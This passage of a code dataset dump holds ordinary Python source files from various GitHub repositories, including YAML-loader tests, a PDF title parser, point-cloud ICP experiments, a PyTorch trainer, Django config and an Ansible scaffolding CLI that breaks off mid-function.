Scaly.\"),\n ]\n )\n }\n assert yaml.safe_load(text) == expected_load\n\n\ndef test_omap_flow_style():\n text = \"Numbers: !!omap [ one: 1, two: 2, three : 3 ]\"\n expected_load = {\"Numbers\": ([(\"one\", 1), (\"two\", 2), (\"three\", 3)])}\n assert yaml.safe_load(text) == expected_load\n\n\ndef test_merge():\n text = \"\"\"\n - &CENTER { x: 1, y: 2 }\n - &LEFT { x: 0, y: 2 }\n - &BIG { r: 10 }\n - &SMALL { r: 1 }\n \n # All the following maps are equal:\n \n - # Explicit keys\n x: 1\n y: 2\n r: 10\n label: center/big\n \n - # Merge one map\n << : *CENTER\n r: 10\n label: center/big\n \n - # Merge multiple maps\n << : [ *CENTER, *BIG ]\n label: center/big\n \n - # Override\n << : [ *BIG, *LEFT, *SMALL ]\n x: 1\n label: center/big\n \"\"\"\n data = yaml.safe_load(text)\n assert len(data) == 8\n center, left, big, small, map1, map2, map3, map4 = data\n assert center == {\"x\": 1, \"y\": 2}\n assert left == {\"x\": 0, \"y\": 2}\n assert big == {\"r\": 10}\n assert small == {\"r\": 1}\n expected = {\"x\": 1, \"y\": 2, \"r\": 10, \"label\": \"center/big\"}\n assert map1 == expected\n assert map2 == expected\n assert map3 == expected\n assert map4 == expected\n\n\ndef test_unhashable_error_context():\n with pytest.raises(ConstructorError, match=r\".*line.*column.*\"):\n yaml.safe_load(\"{foo: bar}: baz\")\n\n\n@pytest.mark.skipif(not hasattr(yaml, \"CSafeLoader\"), reason=\"requires cyaml loaders\")\ndef test_explicit_loader():\n data = yaml.load(\"{x: 1, z: 3, y: 2}\", Loader=yaml.CSafeLoader)\n assert data == {\"x\": 1, \"z\": 3, \"y\": 2}\n assert list(data) == [\"x\", \"z\", \"y\"]\n\n\n@pytest.mark.skipif(not hasattr(yaml, \"CSafeDumper\"), reason=\"requires cyaml dumpers\")\ndef test_explicit_dumper():\n data = OrderedDict([(\"x\", 1), (\"z\", 3), (\"y\", 2)])\n text = yaml.dump(data, Dumper=yaml.CSafeDumper, default_flow_style=None)\n assert text == \"{x: 1, z: 3, y: 2}\\n\"\n","repo_name":"wimglenn/oyaml","sub_path":"test_oyaml.py","file_name":"test_oyaml.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"38"} +{"seq_id":"11538965648","text":"import os\nfrom PIL import Image\nfrom skimage import io\nimport ANN\n\npath = r\"C:\\Users\\user\\PycharmProjects\\image_hamming\\DATA\"\n\n\ndef CreateModel(pathToImages, nameToSaveModel, sizeVer, sizeHor ):\n model = ANN.BuildANNModel( pathToImages, sizeVer, sizeHor, use_flip=False, use_rotate=False, extend_flag=False)\n model.save(nameToSaveModel)\n\n\ndef UseModel(modelName, fromRange, toRange, pathToSave ):\n ( savedModel, savedImagesNumber, verSize, horSize, layersNum) = ANN.LoadANNModel(modelName) # savedModel = load_model(modelName)\n for i in range(fromRange, toRange + 1):\n Y = ANN.ApplyANNModel( savedModel, i, verSize, horSize )\n img = Image.fromarray(Y.astype('uint8'))\n img.convert('RGB').save(pathToSave + \"\\img_\" + str(i) + \".png\")\n\n\ndef ReverseModel( modelName, imagesPath ):\n ( savedModel, savedImagesNumber, verSize, horSize, layersNum ) = ANN.LoadANNModel(modelName)\n fileNames = os.listdir(imagesPath)\n for fn in fileNames:\n img = io.imread( imagesPath + \"\\\\\" + fn )\n ( ind, binInd ) = ANN.FindInANNModel( savedModel, img )\n print( \"( ind, bin ) = ( \" + str(ind) + \"; \" + str(binInd) + \" ) ==> fName = \" + os.path.basename(fn) )\n\n # for i in range(fromRange, toRange):\n # img = io.imread(imagesPath + \"\\img_\" + str(i) + \".png\")\n # ind = find(img, savedModel)\n # print(\"i = \" + str(i) + \"; IND = \" + 
str(ind))\n\n\nif __name__ == \"__main__\":\n    modelName = path + \"\\gfgModel.h5\"\n    frVerSize = 591\n    frHorSize = 781\n\n    # ------ creation\n    print(\"\\n ************* CreateModel *************** \")\n    #CreateModel(path + \"\\IN\", modelName, frVerSize, frHorSize )\n    #\n    #\n    # # ----- usage\n    print(\"\\n ************* UseModel *************** \")\n    #UseModel(modelName, 0, 255, path + \"\\OUT\")\n\n    # ------ reverse\n    print(\"\\n ************* ReverseModel *************** \")\n    ReverseModel(modelName, path + \"\\OUT\" )\n","repo_name":"SD6399/image_hamming","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22473624728","text":"import sys\nfrom pdfminer.high_level import extract_pages\nfrom pdfminer.layout import LTTextContainer, LTLine, LTChar\n\n#this module contains one public method to parse the title of a typical PDF academic paper, given its filepath\n#the parsing often fails because of difficulty in parsing PDF files\n\ndef getTitle(filepath):\n    \"\"\"main method to extract the title of a pdf file\"\"\"\n    \n    try:\n        filepath = filepath.strip()\n    except TypeError:\n        print(\"filepath not a string\")\n    \n    if not filepath[len(filepath)-4:len(filepath)].lower() == \".pdf\":\n        sys.exit(\"filepath not ending with .pdf in \" + filepath)\n    \n    try:\n        data = extractFirstPageElements(filepath)\n        texts = data[0]\n        fonts = data[1]\n        \n        maxFontPos = extractTitlePos(fonts)\n        uncleanedTitle = extractTitle(texts, maxFontPos)\n        title = cleanTitle(uncleanedTitle)\n        \n    except: #mostly due to IndexError as no texts are read in due to unreadable file or blank page, or some readTexts-fontSize mismatch\n        title = \"Unknown\"\n\n    if len(title) > 120: #ultra-long title likely error\n        title = \"Unknown\" \n    \n    return title\n\n\ndef extractFirstPageElements(filepath):\n    \"\"\"helper method to extract text elements and their corresponding font sizes into lists\"\"\"\n\n    fonts = []\n    elements = []\n    for page in extract_pages(filepath):\n        for element in page:\n            if isinstance(element, LTTextContainer):\n                for text_line in element:\n                    for character in text_line:\n                        if isinstance(character, LTChar):\n                            font_size = character.size\n                            break #first character only, assuming others in text_line have the same size\n                fonts.append(font_size)\n                elements.append(element.get_text())\n        break #read first page only\n    return [elements, fonts]\n\n\ndef extractTitlePos(fonts):\n    \"\"\"helper method to extract the positions having the largest font size\"\"\"\n    font_pos = []\n    maxFont = max(fonts)\n    for pos, size in enumerate(fonts):\n        if size == maxFont:\n            font_pos.append(pos)\n    return font_pos\n\n\ndef extractTitle(elements, positions):\n    \"\"\"helper method to extract those elements having the largest font size, then return as a joined string\"\"\"\n    title = []\n    for i in positions:\n        title.append(elements[i])\n    return \" \".join(title)\n\n\ndef cleanTitle(title):\n    \"\"\"helper method to clean the title by removing \\n and illegal filename symbols\"\"\"\n    \n    englishArticles = (\"a\", \"an\", \"the\") #to remove if start word of title\n    \n    title = title.strip() #remove whitespaces\n    title = title.replace(\"\\n\", \" \") #remove any inline \\n\n    title = title.replace(\":\", \" -\") #replace invalid file : symbol\n    title = title.replace(\"?\", \" \") #replace invalid file ? 
symbol\n title = title.replace(\"*\", \"\") #replace invalid symbol\n title = title.replace(\"@\", \"\") #replace invalid symbol\n title = title.replace(\"/\", \" \") #replace invalid symbol\n title = title.replace(\" \", \" \") #remove potential double whitespaces\n title = title.title() #capitalize each word\n \n #remove starting article if one\n firstWord = title.split()[0].lower() #first word of title\n if firstWord in englishArticles:\n secondWord = title.split()[1] #second word of title\n secondWordPos = title.index(secondWord) #where second word starts\n title = title[secondWordPos:] #remove the starting article off title\n\n #perform word capitalization, some keywords are all lower-case, some words are all upper-case, regular words are letter-capitalized\n words = title.split() #individual words in the title, each letter-capitalized\n lowercaseWords = (\"a\", \"an\", \"the\", \"at\", \"to\", \"from\", \"for\", \"using\", \"of\", \"among\", \"across\", \"during\",\"what\", \"with\", \"and\", \"or\", \"between\", \"in\", \"on\", \"is\", \"are\", \"as\", \"there\", \"under\", \"toward\", \"towards\", \"through\", \"via\", \"by\", \"based\", \"vs\", \"versus\", \"its\", \"it\", \"their\")\n uppercaseWords = (\"us\", \"usa\", \"eu\", \"uk\", \"hk\", \"nyse\", \"ftse\", \"hkse\", \"pca\", \"etf\", \"etfs\", \"fx\", \"ipo\", \"hft\", \"spx\", \"vix\", \"vxx\", \"adr\", \"adrs\")\n capAdjustedWords = []\n for word in words: #check each word one by one\n if word.lower() in lowercaseWords:\n capAdjustedWords.append(word.lower())\n elif word.lower() in uppercaseWords:\n capAdjustedWords.append(word.upper())\n else:\n capAdjustedWords.append(word)\n if capAdjustedWords[0].islower():\n capAdjustedWords[0] = capAdjustedWords[0].capitalize() #captailize in case first word is in lowercaseWords\n title = \" \".join(capAdjustedWords)\n\n #often the final char is some special character so should be removed\n finalChar = title[ len(title)-1 : ]\n if not finalChar.isalnum():\n title = title[0 : len(title)-1] #remove the last char\n \n \n return title\n\n\nif __name__ == \"__main__\":\n filepath = input(\"Enter the file path (using /): \")\n print(getTitle(filepath))\n","repo_name":"feribg/deanstreetlab.github.io","sub_path":"papers/py/titleParser.py","file_name":"titleParser.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5585401313","text":"#!/usr/bin/env python\n\nimport unittest\n\nimport os\nimport numpy as np\nimport scipy.io.wavfile as wavfile\nfrom py2shpss import py2shpss\nfrom py2shpss.HPSS import HPSS\nfrom py2shpss import metric\n\nclass TestObjDecrease(unittest.TestCase):\n here = os.path.dirname(os.path.abspath(__file__))\n wavpath = os.path.abspath(here + \"/../sampleSounds/doremi.wav\")\n fft_sizes = [128, 384, 1024]\n q = [0.001, 0.1, 100]\n\n def test_hm21_obj_decrease(self):\n # load sig\n sr, sig = wavfile.read(self.wavpath)\n self.assertEqual(sr, 8000)\n \n for fft_size in self.fft_sizes:\n # stft\n amp, phase = py2shpss.STFT(fft_size).STFT(sig)\n # hpss\n hpss = HPSS(mode='hm21', eval_obj=True, iter=100)\n _, _, obj = hpss(amp)\n # check loss\n loss = [np.sum(_) for _ in obj]\n for x, y in zip(loss[:-1], loss[1:]):\n self.assertGreaterEqual(x, y)\n\n def test_idiv_obj_decrease(self):\n # load sig\n sr, sig = wavfile.read(self.wavpath)\n self.assertEqual(sr, 8000)\n \n for fft_size in self.fft_sizes:\n for q in self.q:\n # stft\n amp, phase = 
py2shpss.STFT(fft_size).STFT(sig)\n # hpss\n qH = q\n qP = q\n hpss = HPSS(mode='idiv', eval_obj=True, qH = qH, qP = qP, iter=100)\n _, _, obj = hpss(amp)\n # check loss\n loss = [h/qH + p/qP + idiv for h, p, idiv in obj]\n for x, y in zip(loss[:-1], loss[1:]):\n self.assertGreaterEqual(x, y)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"tachi-hi/py2shpss","sub_path":"tests/test_obj_decrease.py","file_name":"test_obj_decrease.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10931574474","text":"from jax import numpy as jnp\n\nfrom jaxdf import Domain, OnGrid\nfrom jaxdf.operators.linear_algebra import dot_product\n\n\ndef test_dot_product_ongrid():\n domain = Domain((3, 3), (0.5, 0.5))\n params_1 = jnp.ones((3, 3, 1)) * 2.0\n params_2 = jnp.ones((3, 3, 1)) * 3.0\n\n x = OnGrid(params_1, domain)\n y = OnGrid(params_2, domain)\n\n z = dot_product(x, y)\n assert z == 54.0\n","repo_name":"ucl-bug/jaxdf","sub_path":"tests/test_linear_algebra.py","file_name":"test_linear_algebra.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"38"} +{"seq_id":"28715543767","text":"bar = list(input())\nanswer = 0\nstack = []\n\nfor i in range(len(bar)):\n if bar[i] == '(':\n stack.append('chunk')\n\n else:\n if bar[i - 1] == '(':\n stack.pop()\n answer += len(stack)\n\n else:\n stack.pop()\n answer += 1\n\nprint(answer)","repo_name":"NaamuKim/algorithm","sub_path":"이찬혁/210815.py","file_name":"210815.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3970763699","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('gamesim', '0005_auto_20151227_1951'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='dispatcher_time',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('time_delta', models.TimeField(null=True)),\n ],\n ),\n ]\n","repo_name":"LarryHillyer/TexasHoldem","sub_path":"gamesim/migrations/0006_dispatcher_time.py","file_name":"0006_dispatcher_time.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9562461310","text":"import numpy as np\nimport IPython\nimport matplotlib.pyplot as plt\nfrom icp import (ls_fit, find_closest_idxs, icp, icp_randsampl,\n\t\t\t\t create_pcloud_xline, get_translation_matrix,\n\t\t\t\t filter_pcloud, get_normals, filter_normals)\nimport transforms3d\n\n\ndef load_carla_radar_npz(npz_file):\n\tdata = np.load(npz_file)\n\tpoints = data['points']\n\tcoords = data['coords']\n\treturn points, coords\n\ndef convert_carla_radar_to_point_cloud(points):\n\n\t# Trig.\n\td = np.cos(points[:, 2]) * points[:, 3]\n\tz = np.sin(points[:, 2]) * points[:, 3]\n\tx = np.cos(points[:, 1]) * d\n\ty = np.sin(points[:, 1]) * d\n\n\t# Point cloud. 
Flip x/y variables to get right-handed coordinate\n\t# system from the left-handed coordinate system of CARLA.\n\tp = np.zeros((3, len(d)), dtype=float)\n\tp[1, :] = x\n\tp[0, :] = y\n\tp[2, :] = z\n\n\treturn p\n\ndef load_radar_pcloud(npz_file):\n\tpoints, coords = load_carla_radar_npz(npz_file)\n\n\t# Negate z and y coordinates to get right-handed coordinate data\n\t# from coordinates of the left-handed coordinate system of CARLA.\n\tcoords[1] = -coords[1]\n\tcoords[2] = -coords[2]\n\treturn convert_carla_radar_to_point_cloud(points), coords\n\n\nif __name__ == '__main__':\n\n\t# Select scenario\n\tnpz_dict = {'pure_translation': ('Pure Translation', 'data/radar_start.npz', 'data/radar_stop.npz')}\n\tscenario = 'pure_translation'\n\tscenario_cfg = npz_dict[scenario]\n\n\t# Selet and configure the algorithms\n\talgorithms = {\n\t\t'icp': (icp, 1, {''}, 'ICP with all points'),\n\t\t# 'icp_randsampl': (icp_randsampl, 10, {''}, 'ICP with random subsampling')\n\t}\n\n\t# Select and load npz files\n\ts, start_coords = load_radar_pcloud(scenario_cfg[1])\n\td, stop_coords = load_radar_pcloud(scenario_cfg[2])\n\n\tt_truth = (stop_coords - start_coords)[0:3]\n\trax_truth, rax_angle = transforms3d.euler.euler2axangle(\n\t\t(stop_coords - start_coords)[3],\n\t\t(stop_coords - start_coords)[4],\n\t\t(stop_coords - start_coords)[5],\n\t\taxes='sxyz'\n\t)\n\n\t# Filter the points clouds\n\ts = filter_pcloud(s, z_min=0.5, z_max=5)\n\td = filter_pcloud(d, z_min=0.5, z_max=5)\n\n\talgorithm_results = {}\n\n\t# Run the algorithms and collect results\n\tfor alg, alg_cfg in iter(algorithms.items()):\n\t\ticp_func = alg_cfg[0]\n\t\ticp_iter = alg_cfg[1]\n\t\ticp_args = alg_cfg[2]\n\n\t\ts_ = np.copy(s)\n\t\td_ = np.copy(d)\n\n\t\tts = []\n\t\tRs = []\n\n\t\tfor n in np.arange(icp_iter):\n\t\t\tprint(n)\n\t\t\tR, t, e = icp_func(s_, d_)\n\t\t\tts.append(t)\n\t\t\tRs.append(R)\n\n\t\talgorithm_results[alg] = {'ts': ts, 'Rs': Rs}\n\n\tfor alg, alg_results in iter(algorithm_results.items()):\n\n\t\tts = alg_results['ts']\n\t\tRs = alg_results['Rs']\n\n\t\tt_error = np.array([np.array(t) - t_truth for t in ts])\n\t\tt_error_norm = np.linalg.norm(t_error, 2, axis=1)\n\t\tmin_error_idx = np.argmin(t_error_norm)\n\n\t\tbest_t = ts[min_error_idx]\n\t\tbest_R = Rs[min_error_idx]\n\n\t\talg_name = algorithms[alg][3]\n\n\t\tplt.figure()\n\t\tplt.title('%s: Translation Error Histogram' % alg_name)\n\t\tplt.hist(t_error_norm)\n\t\tplt.ylabel('Occurrences')\n\t\tplt.xlabel('Translation Error')\n\n\t\tplt.figure()\n\t\te = np.matmul(best_R, s) + get_translation_matrix(s, best_t)\n\t\tplt.plot(d[0, :], d[1, :], 'g+', label='stop pcloud')\n\t\tplt.plot(e[0, :], e[1, :], 'r+', label='transformed start pcloud')\n\t\tplt.title('%s\\n Stop and Transformed Point Cloud (Top View)' % alg_name)\n\t\tplt.xlabel('x (m)')\n\t\tplt.ylabel('y (m)')\n\t\tplt.legend()\n\n\tIPython.embed()","repo_name":"cgiustini/icp_experiments","sub_path":"icp_carla_data.py","file_name":"icp_carla_data.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"9192559418","text":"from curses import meta\nimport torch \nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport pandas as pd\nimport pickle\n\nfrom AA_PWM_dataloader import AaPwmDataset\nclass Trainer:\n def __init__(self, \n model, \n pickle_file, \n metadata_file, \n batch_size,\n aa_mat_size, \n pwm_mat_size,\n loss_fn, \n optimizer, \n n_epochs, \n device, \n seed):\n \n with 
open(pickle_file, 'rb') as instream:\n dict_list = pickle.load(instream)\n \n metadata = pd.read_csv(metadata_file)\n \n #80/10/10 \n train_metadata = metadata.sample(frac = .8,random_state=seed)\n non_train_metadata = metadata[~metadata.uniprot_id.isin(train_metadata['uniprot_id'])]\n validation_metadata = non_train_metadata.sample(frac = .5, random_state = seed)\n test_metadata = non_train_metadata[~non_train_metadata.uniprot_id.isin(validation_metadata['uniprot_id'])]\n\n\n self.training_data = DataLoader(dataset = AaPwmDataset(metadata=train_metadata, \n dict_list = dict_list, \n aa_mat_size = aa_mat_size, \n pwm_mat_size = pwm_mat_size\n ), \n batch_size=batch_size\n )\n self.validation_data = DataLoader(dataset = AaPwmDataset(metadata=validation_metadata, \n dict_list = dict_list, \n aa_mat_size = aa_mat_size, \n pwm_mat_size = pwm_mat_size\n ), \n batch_size=batch_size\n )\n \n self.test_data = DataLoader(dataset = AaPwmDataset(metadata=test_metadata, \n dict_list = dict_list, \n aa_mat_size = aa_mat_size, \n pwm_mat_size = pwm_mat_size\n ), \n batch_size=batch_size\n )\n \n model.to(device)\n self.model = model\n self.loss_fn = loss_fn\n self.optimizer = optimizer\n self.n_epochs=n_epochs\n self.device =device\n \n\n def train(self, dataloader):\n size = len(dataloader.dataset)\n self.model.train()\n n_batches = len(dataloader)\n all_loss = np.repeat([None],n_batches )\n for batch_num, batch in enumerate(dataloader):\n feature, label = batch \n feature = feature.to(self.device)\n label = label.to(self.device)\n pred = self.model(feature)\n loss = self.loss_fn(pred, label)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n all_loss[batch_num] = loss.item()\n \n return np.mean(all_loss)\n\n def test(self, dataloader):\n test_size = len(dataloader.dataset)\n n_batches = len(dataloader)\n all_loss = np.repeat([None],n_batches )\n with torch.no_grad():\n for batch_num, batch in enumerate(dataloader):\n feature, label = batch \n feature = feature.to(self.device)\n label = label.to(self.device)\n pred = self.model(feature)\n loss = self.loss_fn(pred, label)\n all_loss[batch_num] = loss.item()\n return np.mean(all_loss)\n \n def train_loop(self):\n all_training_loss = []\n all_validation_loss = []\n for e in range(self.n_epochs):\n train_loss = self.train(self.training_data)\n all_training_loss.append(train_loss)\n validation_loss = self.test(self.validation_data)\n all_validation_loss.append(validation_loss)\n print(f\"{str(e+1)}/{str(self.n_epochs)} done\")\n return pd.DataFrame({'epoch' : list(range(self.n_epochs)), \n 'train_loss' : all_training_loss,\n 'validation_loss' : all_validation_loss\n })\n\n\n\n\n\n\n\n\n","repo_name":"vinay-swamy/TFSBP","sub_path":"model/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7117939951","text":"import pandas\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import FuncFormatter\n\nimport head as h\n\nstartDay = 5\nendDay = 19\n\n\ndef TopN(n):\n TotalCasesBefore = 'TotalCases0'\n TotalCasesInc = 'TotalCasesInc'\n datas = h.dataDay(startDay)[[h.Region, h.TotalCases, h.NewCases]]\n datas = h.cleanByLine(datas)\n datas[TotalCasesBefore] = datas[h.TotalCases] - datas[h.NewCases]\n datas = h.cleanByLine(datas[[h.Region, TotalCasesBefore]])\n datae = h.dataDay(endDay)[[h.Region, h.TotalCases]]\n joinData = pandas.merge(left=datas, right=datae, how='inner', left_on=h.Region, 
right_on=h.Region)\n    joinData = h.cleanByLine(joinData)\n    joinData[TotalCasesInc] = joinData[h.TotalCases] - joinData[TotalCasesBefore]\n    joinData.sort_values(by=TotalCasesInc, inplace=True, ascending=False)\n    joinData = joinData.iloc[0:n]\n    return joinData[h.Region]\n\n\nn = 10\ncountrys = list(TopN(n))\ndays = list(range(startDay, endDay + 1))\nfor i in range(n):\n    country = countrys[i]\n    dataStart = h.cleanByLine(h.dataDay(startDay)[[h.Region, h.NewCases]])\n    dataStart.set_index([h.Region], inplace=True)\n    data = [int(dataStart.loc[country][h.NewCases])]\n\n    dataDays = []\n    for j in range(startDay, endDay + 1):\n        dataDay = h.cleanByLine(h.dataDay(j)[[h.Region, h.TotalCases]])\n        dataDay.set_index([h.Region], inplace=True)\n        dataDays.append(dataDay.loc[country][h.TotalCases])\n    print('||', country, dataDays)\n    for j in range(endDay - startDay):\n        data.append(dataDays[j + 1] - dataDays[j])\n    plt.plot(days, data, lw=1, c=h.color(i), marker=None, ms=4, label='NO.' + str(i + 1) + ':\\n' + country)\n\nfig = plt.gcf()\nfig.set_size_inches(9.5, 6.5, forward=True)\n\nplt.rcParams['savefig.dpi'] = 180\nplt.rcParams['figure.dpi'] = 180\nplt.subplots_adjust(right=0.82, left=0.075)\nplt.title('New Cases From 2021-12-' + str(startDay) + ' to 2021-12-' + str(endDay))\nplt.xticks(days)  # x-axis ticks\nplt.xlim(startDay - 0.1, endDay + 0.1)  # x-axis range\nplt.xlabel('day in Dec.2021')  # x-axis label\nplt.ylabel('new cases')  # y-axis label\nplt.gca().yaxis.set_major_formatter(FuncFormatter(h.showInKilo))\nplt.legend(bbox_to_anchor=(1.02, 0), loc=3, borderaxespad=0)\nplt.show()\n","repo_name":"Versocial/covid19Analyze","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40547928492","text":"from django.contrib import admin\nfrom Book.models import *\nfrom datetime import datetime\n\n\ndef make_active(modeladmin, request, queryset):\n\tqueryset.update(status='1',modified=datetime.now())\nmake_active.short_description = \"Move Items to Active\"\n\ndef make_deactive(modeladmin, request, queryset):\n\tqueryset.update(status='0',modified=datetime.now())\nmake_deactive.short_description = \"Move Items to Deactive\"\n\n\nclass MstAreasAdmin(admin.ModelAdmin):\n\texclude = [\n\t\n\t\t\t]\n\tsearch_fields = [\n\t\t\t\t\t'area_name',\n\t\t\t\t\t'area_code'\n\t\t\t\t]\n\tlist_display = [\n\t\t\t\t\t'area_name',\n\t\t\t\t\t'area_code'\n\t\t\t\t]\n\n\tactions = [make_active, make_deactive]\n\tlist_per_page = 10\n\n\tdef save_model(self, request, obj, form, change):\n\t\tif not change:\n\t\t\tobj.created = datetime.now()\n\t\telse:\n\t\t\tobj.modified = datetime.now()\n\t\tobj.save()\n\tdef has_delete_permission(self, request, obj=None):\n\t\treturn False\n\tdef has_add_permission(self, request, obj=None):\n\t\treturn False\n\n\nclass MstSeriesAdmin(admin.ModelAdmin):\n\texclude = [\n\t\n\t\t\t]\n\tsearch_fields = [\n\t\t\t\t\t'series_name',\n\t\t\t\t\t'series_code'\n\t\t\t\t]\n\tlist_display = [\n\t\t\t\t\t'series_name',\n\t\t\t\t\t'series_code'\n\t\t\t\t]\n\n\tactions = [make_active, make_deactive]\n\tlist_per_page = 10\n\n\tdef save_model(self, request, obj, form, change):\n\t\tif not change:\n\t\t\tobj.created = datetime.now()\n\t\telse:\n\t\t\tobj.modified = datetime.now()\n\t\tobj.save()\n\tdef has_delete_permission(self, request, obj=None):\n\t\treturn False\n\tdef has_add_permission(self, request, obj=None):\n\t\treturn False\n\n\nclass MstBooksAdmin(admin.ModelAdmin):\n\texclude = 
[\n\t\n\t\t\t]\n\tsearch_fields = [\n\t\t\t\t\t'book_type',\n\t\t\t\t\t'uuid'\n\t\t\t\t]\n\tlist_display = [\n\t\t\t\t\t'title',\n\t\t\t\t\t'book_type',\n\t\t\t\t\t'uuid'\n\t\t\t\t]\n\n\tactions = [make_active, make_deactive]\n\tlist_per_page = 10\n\n\tdef save_model(self, request, obj, form, change):\n\t\tif not change:\n\t\t\tobj.created = datetime.now()\n\t\telse:\n\t\t\tobj.modified = datetime.now()\n\t\tobj.save()\n\tdef has_delete_permission(self, request, obj=None):\n\t\treturn False\n\tdef has_add_permission(self, request, obj=None):\n\t\treturn False\n\nadmin.site.register(MstAreas,MstAreasAdmin)\nadmin.site.register(MstSeries,MstSeriesAdmin)\nadmin.site.register(MstBooks,MstBooksAdmin)","repo_name":"happy111/cotrip","sub_path":"cotrip/Book/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15990127476","text":"#!/usr/bin/env python3\n\"\"\"\nThis module contains the Ansible Wizard CLI.\n\nThe Ansible Wizard CLI is a tool for generating Ansible playbooks and roles.\n\"\"\"\n\n\nimport os\nimport sys\nimport typing\n\nimport jinja2\nimport rich.progress\nimport typer\n\nANSIBLE = typer.Typer(\n    rich_markup_mode=\"rich\",\n    help='Ansible Wizard CLI',\n)\n\n# This goes up 4 directories from the current file,\n# looks horrible but it works\n# TODO: Find a better way to do this\n\nANSIBLE_DIR = os.path.dirname(\n    os.path.dirname(\n        os.path.dirname(\n            os.path.dirname(\n                os.path.abspath(__file__)\n            )\n        )\n    )\n) + '/ansible'\n\nTEMPLATING_ENGINE = jinja2.Environment(\n    loader=jinja2.FileSystemLoader(searchpath='./utils/templates/')\n)\n\nANSIBLE_ROLE_DIRECTORIES = [\n    'tasks',\n    'handlers',\n    'templates',\n    'files',\n    'vars',\n    'defaults',\n    'meta',\n]\n\nANSIBLE_PLAYBOOK_SECTIONS = {\n    'general': 'General purpose playbooks',\n    'net': 'Networking playbooks',\n    'vm': 'Virtualization playbooks',\n    'k8s': 'Kubernetes playbooks',\n}\n\n\ndef generate_readme(\n    name: str,\n    kind: str,\n    directory: str,\n) -> None:\n    \"\"\"\n    Generates a README.md file for a playbook or role.\n    \"\"\"\n    if not os.path.exists(ANSIBLE_DIR):\n        typer.echo(f'ERROR: {ANSIBLE_DIR} does not exist')\n        raise typer.Abort()\n    typer.echo('Please complete the following description')\n    description = typer.prompt(f'{name} is a {kind} that')\n    readme_path = f'{directory}/README.md'\n    typer.echo(f'Creating {readme_path}')\n    template = TEMPLATING_ENGINE.get_template('README.md.j2')\n    rendered_readme = template.render(\n        title=name,\n        kind=kind,\n        description=description,\n    ) + '\\n'\n    with open(readme_path, 'w', encoding='utf-8') as readme_file:\n        readme_file.write(rendered_readme)\n\n\ndef setup_role(role_path: str) -> None:\n    \"\"\"\n    Sets up the directory structure for a role.\n    \"\"\"\n    typer.echo('Setting up role directory structure')\n    for directory in ANSIBLE_ROLE_DIRECTORIES:\n        os.mkdir(f'{role_path}/{directory}')\n        main_file_path = f'{role_path}/{directory}/main.yml'\n        with open(main_file_path, 'w', encoding='utf-8') as main_file:\n            main_file.write('---\\n')\n\n\n@ANSIBLE.command()\ndef playbook(\n    playbook_section: str = typer.Argument(\n        help=f\"\"\"\n        Name of the playbook section to generate the playbook in.\n\n        Valid options are:\n\n        {os.linesep.join([\n            f'{os.linesep}* [bold blue]{section}[/bold blue] - {description}'\n            for section, description in ANSIBLE_PLAYBOOK_SECTIONS.items()\n        ])}\n        \"\"\",\n    ),\n    playbook_name: str = typer.Argument(help='Name of the playbook to generate'),\n    roles: 
typing.Optional[str] = typer.Option(\n default='',\n help='List of roles to include in the playbook, delimited by commas',\n )\n) -> None:\n \"\"\"\n Creates a playbook directory with a [bold blue]README.md[/bold blue]\n and [bold blue]main.yml[/bold blue] file.\n\n If roles are specified, creates a roles directory with a README.md\n and a directory structure for each role.\n\n [bold green]Example[/bold green]:\n\n [italic]ansible-wizard playbook my-playbook-section my-playbook-name --roles role1,role2[/italic]\n \"\"\"\n if playbook_section not in ANSIBLE_PLAYBOOK_SECTIONS:\n typer.echo(f'ERROR: {playbook_section} is not a valid playbook section')\n typer.echo('Type ansible-wizard playbook --help for more information')\n sys.exit(1)\n typer.echo(\n f'Creating playbook {playbook_name} in {playbook_section} section'\n )\n playbook_path = f'{ANSIBLE_DIR}/{playbook_section}/{playbook_name}'\n if os.path.exists(playbook_path):\n typer.echo(f'ERROR: {playbook_name} already exists')\n sys.exit(1)\n os.makedirs(playbook_path, exist_ok=True)\n generate_readme(playbook_name, 'playbook', playbook_path)\n with open(f'{playbook_path}/main.yml', 'w', encoding='utf-8') as main_file:\n main_file.write('---\\n')\n typer.echo(\n f'Generated README.md and main.yml for {playbook_name} playbook'\n )\n if roles:\n roles_list = roles.split(',')\n for role_name in roles_list:\n role_path = f'{playbook_path}/roles/{role_name}'\n os.makedirs(role_path)\n generate_readme(role_name, 